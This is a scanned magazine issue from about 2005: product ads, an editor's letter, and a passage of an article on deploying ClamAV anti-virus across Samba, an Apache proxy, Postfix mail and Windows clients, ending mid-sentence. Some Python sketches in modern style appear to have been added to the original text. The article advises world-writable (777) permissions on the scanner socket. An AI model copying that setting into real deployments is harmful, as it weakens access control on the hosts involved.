UNIX/Linux Account Management


was stuck using NIS, foolin’ around with LDAP. 

User synchronization and security 
problems all over the place. 


Does a simple solution for 

enterprise UNIX/Linux 
account management 

exist in the real world? 
Introducing Symark PowerPassword, User Management Edition, the simple, secure
alternative to NIS, NIS+, and even LDAP, for central UNIX/Linux account management.
One solution for user account, password and login management for all of your data 
center UNIX and Linux platforms. No conflicts. No overhead. No hassles. 


PowerPassword User Management Edition 


• Centralized account deployment 
to any host 

• Automatic UID/GID synchronization 

• Highly secure password policies 

• Login access control to any host, 
by user, group, time, method 

• Detailed Reports for UNIX/Linux 
Audits and Regulatory Compliance 
To see the full benefits of PowerPassword
User Management Edition visit our website 

at www.symark.com or call us at 800-234-9072. 

Act now to receive specially discounted Starter Pack 
pricing on your initial purchase. 


Supports over 25 different UNIX and Linux platforms.

HP Tru64 UNIX 5.1a, 5.1b
Debian GNU/Linux 3.0
Digital UNIX 4.0F, 4.0G
HP-UX 11.00 and 11i, 32/64-bit
IBM RS/6000 AIX 5L v5.1, v5.2
Red Hat Enterprise Linux 3 (x86, 32-bit)
Sun SPARC Solaris 2.5.1, 2.6
Sun SPARC Solaris 7, 8, 9
Sun x86 Solaris 7, 8, 9
SUSE Linux 7.3, 8.0, 8.1
Not just secure. Symark secure.
The Sentinel32 is now available with an optional 100 Base FX fiber interface permitting users to access servers
and devices on a network up to 10 kilometers (6.2 miles) away as if they were on the local network. 

The 100 Base FX option also allows the Sentinel32 to be connected directly to a fiber optic backbone 
without the need of a media converter, thus eliminating a potential point of failure. 



SENTINEL32 SECURE console server

Designed specifically for mission critical server applications with superior redundancy and reliability features! 




■Hot Swappable Dual Power Supplies
■Hot Swappable Interfaces
■Full Distribution Linux (not embedded)
■Dual NICs with Network Port Bonding/Trunks
■Dual Console Ports
■OpenSSH, OpenLDAP, NIS, TACACS+
■SSH Direct to Port/IP Option
■Sun Break-Safe "Solaris Ready"
■100 Base FX Fiber Network Connectivity Option
■-48 Volt Models Available


LOGICAL 

SOLUTIONS 


Visit our website 
to compare our features 
with those of 
our competitors. 

Then make the Logical Choice! 
www.thinklogical.com 





Corporate Office: 

100 Washington Street 
Milford, CT 06460 
TEL [203] 647-8700 
FAX [203] 783-9949 


Best Features, Best Support, Lowest Prices! 


CALL 

800-291-3211 

AND TALK TO A LIVE PERSON 



USA 


EMAIL info@thinklogical.com 


The first issue of the new year is typically the one we dedicate to open source 
topics. This issue is no exception, and it features articles describing open source 
tools that, among other things, scan your network for viruses, perform disk-to-disk 
backups, enforce IP access policy, and distribute DNS data to multiple servers. 
Also in this issue, Bryan Smith begins a two-part article examining the terms open
and proprietary, which are generally used to categorize software. He proposes new, 
more distinct labels and assesses the associated deployment risks of the various 
types of software. 

If you’re interested in following other open source vs. proprietary battles, the
Groklaw site at: http://www.groklaw.net provides daily updates and commentary
along with historical perspective on the machinations surrounding the SCO
controversy and related issues. It’s worth a moment to check out the current state
of affairs there.

Sys Admin magazine recently adopted a new online look. I invite you to visit the
Sys Admin Web site at: http://www.sysadminmag.com and see what you think.
We're still fixing a few trouble spots, so be sure to send feedback if you see broken
links or other problems. We’re in the process of converting UnixReview.com to this
new format as well, so look for it to be updated in the near future.

Also, just in time for holiday shopping, Version 10 of the Sys Admin back issue
CD-ROM is now available. It includes complete articles and code from the
magazine’s premiere issue in 1992 through December of 2004. It also includes The
Perl Journal archives from 1996 through 2002 and offers both HTML and ASCII
versions of the content. As in the past, a few articles do not appear on the CD 
either because we couldn't track down the authors to request permission or 
because they chose not to have their content included. The back issue CD can be 
ordered online through the Sys Admin Web site for $49.95 ($24.95 for registered 
owners of the previous version). See page 58 for more information. 

If you’d like to see an article of yours included in a future Sys Admin CD, you
can begin by sending a manuscript proposal to our managing editor, Rikki
Endsley, at: rendsley@cmp.com. Currently, we’re looking for articles on spam
management, clustering, remote access, and database management, but other
topics will be considered. Please send questions or comments to Rikki or to me
at: aankerholz@cmp.com.

Sincerely yours,

Amber Ankerholz 

Editor in Chief 
Linux + Disks + Ethernet = EtherDrive®


Disks go inside servers, right? If you run out of disk space
you get another server...right? Well, that used to be the
case, but not any more. Now you can use Coraid EtherDrive
storage blades and expand the disk space on any
server.


EtherDrive Storage Blades insert into a shelf of 10 slots.
This means you can have 4TB in one 3U of rack space.
You can add up to 4,096 shelves on a single network. That
means you can have servers sharing 16 Petabytes. Imagine
that.


The Coraid EtherDrive Storage Blades are simple and
easy to use. And the best part is, you already know how.
An EtherDrive Storage Blade is a disk drive mounted on a
very small server attached directly to your network. Each
server, called a nanoserver, has firmware that puts the
disk's storage right on your server. No IP addresses. No
logging into a funky web server. Just disks on your servers.

Just Disk Drives on Ethernet 

Our open protocol, ATAoverEthernet, allows the most in
flexibility and simple operation. The best part is, since they
just look like local disk, you already know how to use them.
Use any file system software. Use any RAID software. Use
any volume management software. It’s all up to you to
decide how to organize your disks. And, since our protocol
is open, you know everything about the whole shooting
match. The protocol is simple, only 8 pages. Our open
source device driver means you never have to look at the
protocol. But isn’t it good to know you can?

Complete Control 

You have complete control over the contents of the disk.
No funny stuff here. We don’t store anything on your disks
that you don’t want us to. You can take a disk from a running
system, mount it on an EtherDrive Storage Blade, and
mount it. That means you are always in control. No reformatting.
No captive data. Just disk drives on the network.
You never have to worry about getting your data off of an
EtherDrive Blade if it fails. Just mount the disk on a system
or another Blade and you’re back in business.


40,000 Disks on your servers 

A system that can go from a couple of disks, all the way to
40,000 disks. In whatever increment you want. That’s probably
more than you’ll ever need, but isn’t that the idea? To
never run out of expandability. Since our shelves mount in
simple relay racks just like your switches, you never run out
of room. Never have to junk a box just because you can’t
get modules. Never have to fork lift obsolete systems.
Never have to buy more servers when all you want is more
disks.

Processing Power with Each Blade 

The blades can go fast, too. Since each disk has its own
cpu, memory and Ethernet interface, they all work in perfect
unison. Striping software will read blades in parallel. The
wider the stripe, the faster the I/O.

Each Blade isn't limited to a single server, either. A set of
servers can access the same group of EtherDrive Storage
Blades. They can share read only file systems. They can
use already available software like RedHat’s GFS to share
file systems. And it won't break the bank either. Using
EtherDrive Storage Blades you only add pennies to the cost
of the raw storage. Only $.71 per Gigabyte.


www.coraid.com 

info@coraid.com 

1-877-548-7200 












SECURITY 


Open Source Anti-Virus for the Whole 
Network: ClamAV 

James Mikusi 


Until recently, there was not a strong open source presence in
the anti-virus realm. Now, however, there is more than one
project in this arena, and the ClamAV project in particular
is proving its ability to provide software scanning in a way that's
adaptable and effective.

In the spirit of the Unix philosophy, Doug McIlroy said, “Write
programs that do one thing and do it well. Write programs to work
together.” ClamAV demonstrates just how effective this model continues
to be. The ClamAV engine simply filters any input given and
outputs a basic summary stating whether a virus was detected. This
simplicity makes it appropriate for scanning content on a local file
system, network file system, Web proxy, mail gateway, or whatever.
Simply send it input and get a yes/no result.

ClamAV Features 

When weighing the effectiveness of anti-virus software, two
features must be considered. The first aspect is the frequency and
timeliness of virus database updates. This is an area of strength for
open source collaboration because virus database updates are
made continuously by the project's maintainers with help from the
Internet community in general. The ClamAV project hosts a Web
form where new virus discoveries can be posted and inspected by
the virus database maintainers and added to daily.cvd publications if
appropriate. On occasion, the ClamAV project has even been the
first to identify a new virus and has thus earned the right to name
it. In my opinion, this global contribution to the virus database
makes ClamAV a force to be reckoned with.

The second consideration is the performance of the scanning
engine. How long do scans take? Are viruses detected pre-infection?
Are suspicious files with virus-like actions, but not in the definition
database, treated like viruses for protection? In this aspect, the
ClamAV "suite" performs excellently, too. It's a simple, straightforward
scanning engine.

When setting up ClamAV, be sure you use the most recent 
code (1). As the project has advanced, there have been changes to 
the virus database definition formats that require using the most 
up-to-date software distributions to make sure the most recent 
virus definitions are effective. The ClamAV FAQ says: 

You'll get [a ClamAV installation is OUTDATED] message whenever
a new version of ClamAV is released. To detect all the latest
viruses, it’s not enough to keep your database up to date. You also
need to run the latest version of the scanner. You can find the latest
release at http://www.clamav.net under the stable link. Running
the latest stable release also improves stability.

The Dissection 

The ClamAV home page is http://www.clamav.net. The project
is hosted on SourceForge where official releases or snapshots
may be obtained. Check the “3rd Party Software" link on the home
page to find an RPM binary that can even be obtained via yum
install clamav with the appropriate entries in /etc/yum.conf (2).

As of this writing, the current version of ClamAV is 0.80-1. This
article will concentrate on RPM distributions where available for
their ease of installation and updates. If not using yum (or similar),
obtain both clamav-0.80-1.i386.rpm and clamav-devel-0.80-1.i386.rpm
(the latter being necessary only for compilation of
mod_clamav.so and vscan-clamav.so, discussed later). Install both
RPMs with rpm -ivh.

Two parts make up the engine of ClamAV: clamd, the scanning
daemon, and freshclam, the virus database update retrieval tool. By
default, ClamAV keeps its virus definitions in /var/lib/clamav with two
definition files: main.cvd and daily.cvd. The file /etc/freshclam.conf
controls the basics of the freshclam process, which downloads the
two abovementioned definition files and alerts the clamd engine to
reload the virus definitions. Later in this article, I will describe how
to create a local virus definition server.

The frequency of the freshclam daemon should be directly
related to how much traffic flows in and out of any given network.
In small office environments, I find two updates during the workday
ease my mind. High-traffic sites or paranoid admins may want to
consider hourly updates. The only other out-of-the-box edit to make
for virus database updates is to point to a regionally local update
server:

DatabaseMirror db.XY.clamav.net # XY = country code, i.e., US for us.
An RPM install will default to running freshclam in daemon mode
with daily updates run as the user defined by DatabaseOwner,
which should be clamav. This is necessary because only the user
clamav should be able to read/write the virus database definitions in
/var/lib/clamav. The number of updates per day can be controlled
via the freshclam option --checks=X, where X is the number of times
per day.
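
To make the arithmetic concrete, the sketch below converts a checks-per-day value into the time between checks. It assumes the checks are spaced evenly over 24 hours; the helper name check_interval_minutes is made up for this illustration and is not part of ClamAV.

```python
def check_interval_minutes(checks_per_day: int) -> float:
    """Return the approximate number of minutes between database checks.

    Assumption: checks are spread evenly across a 24-hour day.
    """
    if checks_per_day < 1:
        raise ValueError("checks_per_day must be at least 1")
    return 24 * 60 / checks_per_day


# Daily, twice-daily, and hourly schedules mentioned in the text.
for n in (1, 2, 24):
    minutes = check_interval_minutes(n)
    print(f"{n:2d} checks/day -> one check every {minutes:.0f} minutes")
```

Under that assumption, two checks per day land 12 hours apart rather than both inside the workday, so a site that wants updates during office hours may prefer a higher value.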

The second part of the work is done by the clamd daemon. It can
operate in either of two modes: Unix socket or TCP socket. Either of
the following configuration directives from /etc/clamd.conf controls
this behavior. Choose one! ClamAV can’t listen to both Unix and
network sockets concurrently. Unless using a central virus scanner
server, the first option is preferred:

LocalSocket /var/run/clamav/clamd.sock # UNIX socket owned by clamav

Or: 

TCPAddr 127.0.0.1 

TCPSocket 3310 # default port 

If a dedicated scanning server is used for the whole network, then 
setting TCPAddr to the address of a network interface is necessary. 
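
Whichever mode is chosen, a quick way to confirm that clamd is answering is to send it the PING command and look for PONG. The following is a minimal sketch rather than a full client: the function names are hypothetical, and the socket path and port are simply the values used in this article.

```python
import socket


def ping_clamd(sock) -> bool:
    """Send PING on an already connected socket and check for PONG."""
    sock.sendall(b"PING\n")
    reply = sock.recv(16)
    return reply.strip() == b"PONG"


def connect_unix(path="/var/run/clamav/clamd.sock"):
    """Connect to clamd in Unix socket mode (path taken from this article)."""
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.connect(path)
    return s


def connect_tcp(host="127.0.0.1", port=3310):
    """Connect to clamd in TCP mode (default port 3310)."""
    return socket.create_connection((host, port))
```

For example, ping_clamd(connect_unix()) should return True on a host where clamd listens on the local socket, and ping_clamd(connect_tcp("192.168.1.9")) would test a hypothetical central scanning server at that address.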

The default working directory is /tmp, but it can be changed with
the following directive:

TemporaryDirectory /tmp/clamav # setting used for this article 

Other configuration directives allow the control of logging, scanning
of mail files, scanning of archives (zip and rar files), and reaction to
detected viruses. (Note: the developers warn that the RAR library
leaks and necessitates regular restarts of clamd if it is turned on with
ScanRAR). Detected viruses may simply cause ClamAV to return
its findings, but these files can optionally be quarantined, deleted,
and/or cause notifications to be sent to admins. The VirusEvent
directive takes any command as an argument and allows virus
response to be configured to your heart’s desire. For example:

VirusEvent sendemail pip@foo.bar "Found %v." # my custom script "sendemail"

where %v is replaced with the virus name. See the clamd.conf man
page for a full listing of configuration options.
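
The article does not show the author's "sendemail" script, so the following is only a guess at what such a helper might look like: a small Python script that takes a recipient and a message and mails the alert through the local mail server. The sender address, subject line, and the use of an SMTP server on localhost are all assumptions made for this sketch.

```python
import smtplib
import sys
from email.message import EmailMessage


def build_alert(recipient: str, text: str,
                sender: str = "clamav@localhost") -> EmailMessage:
    """Build the alert message; the sender and subject are placeholders."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "ClamAV virus alert"
    msg.set_content(text)
    return msg


def send_alert(recipient: str, text: str, host: str = "localhost") -> None:
    """Hand the alert to an SMTP server assumed to run on this machine."""
    with smtplib.SMTP(host) as smtp:
        smtp.send_message(build_alert(recipient, text))


# Only act when called the way the VirusEvent example calls it:
#   sendemail pip@foo.bar "Found <virus name>."
if __name__ == "__main__" and len(sys.argv) == 3:
    send_alert(sys.argv[1], sys.argv[2])
```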

In Action 

The most basic virus scan can be made with the clamscan executable
included in the distribution. When run on a Unix client
where the clamd daemon is running (in either Unix socket or network
mode), it takes filenames, directories, or standard input as
arguments and scans them for viruses. While a simple summary
with findings is dumped to standard output, the clamscan process
simply returns 0 for no detection, 1 for a detected virus, and any
other positive number identifying an error in processing.
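
Because the result is carried in the exit status, clamscan is easy to wrap in a script. The sketch below maps the exit codes described above to a simple verdict; the function names are illustrative, and it assumes clamscan is on the PATH.

```python
import subprocess


def interpret_exit_code(code: int) -> str:
    """Translate a clamscan exit status into a verdict."""
    if code == 0:
        return "clean"      # no virus detected
    if code == 1:
        return "infected"   # at least one virus detected
    return "error"          # anything else is a processing error


def scan(path: str, scanner: str = "clamscan") -> str:
    """Scan one file or directory and return the verdict."""
    result = subprocess.run(
        [scanner, "--no-summary", path],
        capture_output=True,
        text=True,
    )
    return interpret_exit_code(result.returncode)
```

A caller might use it as: if scan("/home/shared/upload.zip") == "infected", move the file aside. The path here is only an example.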

One thing to keep in mind while working with ClamAV is permissions.
The ClamAV installation defaults to creating the user
clamav. This is the user name assumed by clamd and freshclam,
the owner of virus database files, and quarantine directories. Not
getting scan results? Make sure the requesting process can
read/write the domain socket. Verify /var/run/clamav/clamd.sock
has permissions 777 and /tmp/clamav permissions of at least 770
and that both files are owned by uid clamav, gid clamav.
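
These checks can be scripted. The following sketch reports the type, mode, ownership, and accessibility of a path so that the values can be compared with the ones recommended above; describe_path is a hypothetical helper name, not a ClamAV tool.

```python
import os
import stat


def describe_path(path: str) -> dict:
    """Collect the permission details that matter for clamd access."""
    st = os.stat(path)
    return {
        "is_socket": stat.S_ISSOCK(st.st_mode),
        "mode": oct(stat.S_IMODE(st.st_mode)),  # e.g. '0o777'
        "uid": st.st_uid,
        "gid": st.st_gid,
        # Can the user running this script read and write the path?
        "accessible": os.access(path, os.R_OK | os.W_OK),
    }
```

Running describe_path("/var/run/clamav/clamd.sock") as the user that issues scan requests (the Samba or Apache user, for instance) shows whether that user can actually reach the socket.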


Perimeter Scanning 

If using a Samba file server, then ClamAV can use vscan-clamav
(from the samba-vscan project) via the VFS interface of Samba.
Although this is said to work with Samba v2.2, the procedures
here were achieved with Samba v3. This utility is not yet available
as an RPM, so the source code needs to be downloaded. The
first thing necessary to compile the vscan-clamav module is the
Samba source code. We'll get everything we need here from
samba-3.0.7-1.src.rpm (3). Run the following to make the RPMs
and extract the source (this step is necessary even if you already
have a Samba binary installed since compilation of samba-vscan
requires the Samba source and make proto run within):

rpmbuild --rebuild samba-3.0.7-1.src.rpm

For Red Hat 9.0, this leaves the produced RPMs in
/usr/src/redhat/RPMS/i386:

rpm -Uvh /usr/src/redhat/RPMS/i386/samba-3.0.7-1.i386.rpm

Then, to get the sources to build samba-vscan against:

rpm2cpio samba-3.0.7-1.src.rpm | cpio -i samba-3.0.7.tar.bz2
tar xjf samba-3.0.7.tar.bz2
cd <samba-source-root>/source
./configure; make proto

samba-vscan doesn’t yet come in RPM form, so obtain
samba-vscan-0.3.5.tar.bz2. The module needed can be produced as
follows:

tar xjf samba-vscan-0.3.5.tar.bz2; cd samba-vscan-0.3.5
<editor-of-choice> clamav/vscan-clamav.h # if customizations are desired
./configure --with-samba-source=<samba-source-root>/source
make clamav
# or the lib/samba/vfs location for your installation
cp vscan-clamav.so /usr/lib/samba/vfs/

The Samba source directory must be referenced via
--with-samba-source. Successful compilation of samba-vscan will
produce the file vscan-clamav.so in the current directory, not the
clamav/ directory. The last copy command puts the module where
Samba can use it. As run on Red Hat 9.0, the make clamav stage
will produce numerous warnings regarding the production of
.po files and undefined references. Despite the discomfort they
produced, they didn’t seem to interfere with the production of
vscan-clamav.so and its ability to work with Samba. After compilation,
copy the config files into place:

cp clamav/vscan-clamav.conf /etc/samba/ 

Next, make the following addition to the global section of the 
smb.conf file (or just to specific share definitions to virus-scan only 
some shares): 

vscan-clamav: config-file = /etc/samba/vscan-clamav.conf 
vfs object = vscan-clamav

This vscan-clamav.conf file controls the behavior of Samba and
its reaction to infected files. Its most noteworthy directives follow.
Of these, note that a file can be scanned both when a user requests to
open it AND to close it. This may appear redundant but consider a
situation where an infected client computer opens a file for editing,
has a virus infect the local working copy, and then writes it to the
file server on close. Also, if choosing to quarantine infected files for
later inspection, the file name may be prepended with a string for
easy identification:

clamd socket name = /var/run/clamav/clamd.sock # tell it where
                                               # clamd listens.
scan on open = yes
scan on close = yes
deny access on error = yes
deny access on minor error = yes # iron fist.
send warning message = yes # use windows messaging to notify the
                           # user when viruses are found.
# only necessary if keeping viruses for later inspection.
# make sure this directory is NOT public or shared via samba!
quarantine directory = /tmp/clamav
quarantine prefix = VIRUS_INFECTED-

If Windows clients are not running the Microsoft messaging server
process (which often is not necessary or desirable in its own regard),
the error message sent by the "deny access on error" directive won’t
be able to notify the client why a file can't be opened. Instead, the
user will receive a local error about reading the file tantamount to
the file being corrupted. This can be confusing and frustrating to
end users. Also note that if Samba can't contact the clamd
daemon for some reason, it will also generate
an error.

The beauty of the samba-vscan implementation
is that files are scanned and
infections detected even before users can open them.

Using ClamAV as part of a full anti-virus
network solution helps prevent viruses
from ever reaching the desktop, ignoring
removable media. With proper IT policy, it
would be very difficult for infections to
spread in your network.

mod_clamav Apache 
Module 

I covered protecting file servers, but
now I’ll concentrate on scanning in-bound
and out-bound data, the first being Web
content. The first thing needed is the ever
popular Apache Web server with module
support (DSO), mod_proxy, and the source
distribution file mod_clamav-0.21.tar.gz
(4). The creation of the module mod_clamav
is a simple matter of ./configure;
make; make install; this will require the
availability of the Apache apxs utility. If
it's not auto-detected, then its location can
be specified with the --with-apxs command-line
option when running ./configure:

tar xzf mod_clamav-0.21.tar.gz 
cd mod_clamav-0.21 

./configure [--with-apxs=/usr/sbin/apxs]
make 


If you're not running an entirely RPM or deb-based system, then
make install may work, but the defaults it assumes are not correct
in most cases. Find the produced module in ./.libs/mod_clamav.so
and copy it to /etc/httpd/modules (or the server's module directory).
Also copy safepatterns.conf to /etc/httpd/conf/. It saves the proxy
the trouble of scanning unnecessary files.

Now it's time to modify httpd.conf. mod_clamav will chain its
actions onto mod_proxy in the <Proxy> specification. While
proxy support can be added to a content serving server, the following
configuration file is intended to be used as a minimal
standalone proxy/virus-scanning server. I prefer this method
because it conforms to the Unix philosophy referenced at the beginning
of this article. Copy it and run it via /usr/sbin/httpd -f
/etc/httpd/conf/httpd-clamav-proxy.conf (Listing 1).

Note also the SetHandler clamav mapped to the virtual directory
/clamav, which permits retrieving a status page from
mod_clamav and is useful for finding out whether it's up and running.

Local Virus Database Server 

If you read the Apache config file closely, you'll have noticed a
VirtualHost section. This simply adds the ability to serve the content
in /var/lib/clamav where the virus database definition files live.
Via this method, and by adding "virusdb" to point to this host in
your DNS configuration, it can serve the files main.cvd and
daily.cvd to other internal clients. Just point client installs of
ClamAV to "your-virtualhost.yourdomain.com" as well as coordinate
this with your DNS zone. I liked setting up a DNS record for
"virusdb.mydomain.com".
Mail Filtering

There are a number of SMTP projects using ClamAV, but I chose
clamsmtp for this article because it’s available as an RPM (or just a
.spec to build your own RPM) and because its design lends itself to
use with almost any mail server software. Essentially, it runs as a
standalone (mail) server accepting mails on a listening socket, scans
them for viruses via clamd, and then sends them back to the delivering
mail server on some other socket. The project's homepage states
that it was designed with Postfix in mind, which will be covered


Listing 1 /etc/httpd/conf/httpd-clamav-proxy.conf

ServerTokens OS
ServerRoot "/etc/httpd"

PidFile run/proxy-clamav-minimal.pid
Timeout 300
KeepAlive On

MaxKeepAliveRequests 100
KeepAliveTimeout 15
User clamav
Group clamav

ServerAdmin admin@yourdomain.com
ServerName proxy.yourdomain.com:8080
UseCanonicalName Off

# if access control is desired
AccessFileName .htaccess

# proxy requests
Listen 192.168.1.9:8080

# use default web port for client virusdb requests
# make sure DNS is updated to use this!
Listen 192.168.1.140:80

# Dynamic Shared Object (DSO) Support
# just the ones necessary for a virus scanning proxy.
#
# mod_access is only needed if requiring user authentication to proxy
# server
LoadModule access_module modules/mod_access.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule vhost_alias_module modules/mod_vhost_alias.so
LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule clamav_module modules/mod_clamav.so

#
# Proxy Server directives.
#
<IfModule mod_proxy.c>

ProxyRequests On
AllowCONNECT 8080

<Proxy *>
    # make sure content gets filtered!
    SetOutputFilter CLAMAV
    Order deny,allow
    Deny from all
    # your local subnet
    Allow from 192.168.1.
    # or if you prefer
    # Allow from yourcompany.com
</Proxy>

ProxyVia On

# To enable the cache as well, edit and uncomment the following lines:
# (no cacheing without CacheRoot)
#
#CacheRoot "/etc/httpd/proxy"
#CacheSize 5
#CacheGcInterval 4
#CacheMaxExpire 24
#CacheLastModifiedFactor 0.1
#CacheDefaultExpire 1
#NoCache a-domain.com another-domain.edu joes.garage-sale.com
</IfModule>

# End of proxy directives.

ClamavTmpdir /var/tmp/clamav


here. On the other hand, check the references at the end of the article
because there may already be a project to suit your mail server
specifics (5). For example, there is a clamav milter project for use
with sendmail.

Get the clamsmtp RPM (clamsmtp-1.0-1.src.rpm at the time of
writing) and build it with:

rpmbuild --rebuild clamsmtp-1.0-1.src.rpm
rpm -Uvh clamsmtp-1.0-1.i386.rpm


ClamavDbdir /var/lib/clamav
ClamavSafetypes image/jpg
ClamavMode daemon
ClamavSocket /var/run/clamav/clamd.sock
ClamavTrickleInterval 10
ClamavTrickleSize 1024
ClamavSizelimit 1000000

# names for shared memory and mutex. Note that we don't know exactly
# what apache does in the background. However, we should make sure
# that apache can create these files if necessary
#ClamavShm /usr/local/apache2/logs/clamav.shm
#ClamavMutex /usr/local/apache2/logs/clamav.lock

# if the clamd daemon crashes, we will have a problem connecting to it.
# while it'll prevent web access, i'll hear about it soon enough.
ClamavAcceptDaemonproblem off

LogLevel warn

# we would like to get a more complete log file
ClamavExtendedLogging on

LogFormat "%t %!304{clamav:status}n %{clamav:details}n \
%{clamav:virusname}n request=\"%r\", status=%s, sent=%!304b, \
delay=%!304D" clamav_stats
CustomLog logs/clamav.scan_log clamav_stats

LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \
\"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
ErrorLog logs/proxy.error_log
CustomLog logs/proxy.access_log combined

# define the location for status information
<Location /clamav>
    SetHandler clamav
    order deny,allow
    allow from 192.168.1.
</Location>

# safe patterns is much better than ClamavSafetypes
# also found in the distribution samba-vscan-src/clamav dir
Include conf/safepatterns.conf

# we have a customized message in case we find a virus
ClamavMessage "\
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\">\
<html>\
<head>\
<title>%i found virus</title>\
</head>\
<body text=\"#000000\" bgcolor=\"#ffffff\">\
<basefont size=\"4\">\
<h1><center>%i found virus</center></h1>\
<p>The virus <b>%v</b> was found while downloading <i>%u</i>.\
The transfer has been aborted.</p>\
</basefont>\
</body>\
</html>\
"

<VirtualHost 192.168.1.9:80>
    ServerAdmin root@localhost
    ServerName virusdb
    DocumentRoot /var/lib/clamav
    ErrorLog logs/virusdb.error_log
    CustomLog logs/virusdb.access_log common
</VirtualHost>
The rather short configuration file, /etc/clamsmtpd.conf, contains
the following notables whose defaults are shown. It must specify
two things for the implementation explained here: the address
where to listen for scan requests, and where to send the results.
Also, make sure /etc/clamd.conf has the ScanMail option enabled,
so the clamd daemon knows to expect emails, too.

This configuration assumes that Postfix, clamsmtp, and clamd
all run on the same server. It uses the loopback address for communication:

OutAddress: 10026 # "ip:port" or just "port"
                  # must coordinate with postfix master.cf
Listen: 0.0.0.0:10025
ClamAddress: /var/run/clamav/clamd.sock # make sure it's not just "clamd"
User: clamav
VirusAction: command # your heart’s desire. Email, page, SMS, fax, ...

Configuring Postfix is a simple matter of some edits to main.cf and 
master.cf. This is taken directly from the project's Web site. This con¬ 
figuration (Listing 2) can be cut and pasted into a Red Hat 9 default 
Postfix distribution in about two minutes for a working solution. 

Just make sure Postfix listens on the loopback address
(main.cf: inet_interfaces = $myhostname, localhost) where
clamsmtp defaults to sending its results if based on this configuration.
Clamsmtp will receive its requests on 127.0.0.1:10025 from
Postfix running on the same machine; ergo, it will send the filtered
mail back on 127.0.0.1:10026. This default behavior comes from
the OutAddress: 10026 config directive, which says send mail back
to the IP address it came from on port
10026. An IP:Port specification can be used
here if needed.
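
The two accepted forms of OutAddress can be illustrated with a few lines of Python. This is a sketch of the behavior described above, not clamsmtp's own parsing code; the function name and the source_ip parameter are invented for the example.

```python
def resolve_out_address(value: str, source_ip: str = "127.0.0.1"):
    """Return (host, port) for an OutAddress value.

    A bare port means "send back to the address the mail came from",
    represented here by source_ip. An "ip:port" value names the
    destination explicitly.
    """
    value = value.strip()
    if ":" in value:
        host, _, port = value.rpartition(":")
        return host, int(port)
    return source_ip, int(value)


print(resolve_out_address("10026"))              # same-host setup in this article
print(resolve_out_address("192.168.1.9:10026"))  # hypothetical separate mail host
```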

Also, clamsmtp defaults to dropping
mail with positive virus scans. I find this a
little discomforting in that I like the fact
that email is reliable and never vanishes
into the ether. Even when there are problems,
I'm confident it will bounce back.

The maintainers have a strong argument in
that virus-infected emails usually have false
reply-to addresses anyway, so bouncing the
mail is wasted effort and bandwidth. You
decide. Change the default behavior of
dropping virus infected mails by setting
Bounce: on in clamsmtpd.conf.

It's also possible to add a header to
the email after scanning and let local
delivery agents, like procmail, do their
own thing. This is accomplished with the
clamsmtpd.conf directive:

ScanHeader: X-AV-Checked: ClamAV using 
ClamSMTP. 
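
A delivery-side script can then test for that header. The sketch below uses Python's standard email module and the X-AV-Checked header name from the directive above; the function name is made up for this example, and a procmail recipe could perform the same check.

```python
from email import message_from_string


def was_scanned(raw_message: str, header: str = "X-AV-Checked") -> bool:
    """Return True if the message carries the scanner's header."""
    msg = message_from_string(raw_message)
    return msg.get(header) is not None


sample = (
    "From: someone@example.com\n"
    "X-AV-Checked: ClamAV using ClamSMTP\n"
    "\n"
    "Hello.\n"
)
print(was_scanned(sample))
```

Keep in mind that a header only shows that some relay added it; mail arriving by another path could carry a forged copy.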

Windows Clients: The 
ClamWin Port 

To make this project complete, there
needs to be a client-based scanner, which is
fulfilled by the ClamWin port. The core
ClamAV project does distribute a Windows
installer but without any GUI front-end.

Maybe this is acceptable in the world of
Unix administration, but it’s not very friendly for the standard end
user. Find the installer on the ClamWin homepage (6).

One drawback of the current ClamWin installation should be
noted: it doesn't support on-access scanning, which might make
it better classified as a virus infection notifier rather than "anti"-virus
prevention. As far as anti-virus software goes, this is very
undesirable but is likely to change in future releases of this project.
On a better note, it uses the same virus database files as the previously
described projects and offers scheduled scans, email notification,
an Outlook plug-in, a tray icon, and a Windows Explorer plug-in.

The ClamWin project distributes an installer that auto-detects the
presence of Outlook and prompts for the option to install the Outlook
plug-in during setup. When starting Outlook, there will then be a
splash screen showing the ClamAV logo but no other noticeable
difference. From installation forward, all Outlook inbound and outbound
email will be scanned for viruses locally. This might be considered
redundant if all the mail is going to a filtered gateway anyway, but
it's probably a good idea nonetheless. If you have users that fiddle
with POP3/IMAP or SMTP settings to check other accounts, then using the
local filter is a good idea. Most desktop stations these days are
plenty over-powered for the typical office desktop user, so a few extra
cycles spent scanning mail is harmless.

Once installed, there are two noticeable differences. First is an icon
in the system tray, which brings up the main configuration interface
when double-clicked. There are nine tabs that include configuration of
the virus database server (use the local VirtualHost replicator
described in the proxy section), email notification, and scheduling of
scans. The second change occurs in Explorer, which gains an option in
the right-click context menu for scanning a single file or folder. This
is great for scanning recent downloads before executing them.

Unfortunately, the current installer (v0.35-2) doesn't support network
deployment or easy replication of settings. The installer asks whether
to install for the current user or All Users, but config files are per
user in their "HOME\Application Defaults\.clamwin" folder (Win2K/XP) or
"C:\Windows\Profiles\username\.clamwin" (Win98).

For small office installations, I've found it easy enough to configure
one client, create the desired configuration, then copy the files
ClamWin.conf and ScheduledScans from C:\Documents and
Settings\username\Application Data\.clamwin to new client
installations. I put them in C:\Program Files\ClamWin\bin (as opposed
to a single user's configuration directory), where they will be copied
as defaults for new users on first login. Large installations might
want these files maintained via policy files or as read-only files in
their home directories. This is a trivial task if you're already using
Samba for network logins.

The need for the COM_SPEC environment variable in ClamWin should also
be mentioned. This variable references the command.com (Win98) or
cmd.exe (Win2K, WinXP) command prompt (or DOS shell). It is usually set
on Win98 and WinXP clients, but I found some Win2000 machines where it
was not set. If it is missing, it can easily be added to your system
variables. (In WinXP, it's been renamed "ComSpec".)

Testing: Is It Working? 

It's installed, but is it doing its job? It's not practical to pass
known viruses around the network just to see if tools are doing their
jobs, so the European Institute for Computer Anti-Virus Research
(EICAR) provides a good solution. They've come up with the idea of a
text file whose signature is generally accepted by most anti-virus
